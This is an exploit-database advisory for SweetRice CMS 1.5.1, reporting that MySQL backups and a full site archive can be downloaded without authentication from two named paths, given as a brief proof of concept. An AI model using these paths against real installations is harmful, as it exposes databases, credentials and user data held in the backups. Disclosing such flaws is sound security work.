SweetRice 1.5.1 - Backup Disclosure Vulnerability

2016-11-06T00:00:00
ID 1337DAY-ID-26249
Type zdt
Reporter Ashiyane
Modified 2016-11-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
 
 
Proof of Concept :
 
You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
 
and can access to website files backup from:
http://localhost/SweetRice-transfer.zip

#  0day.today [2018-02-19]  #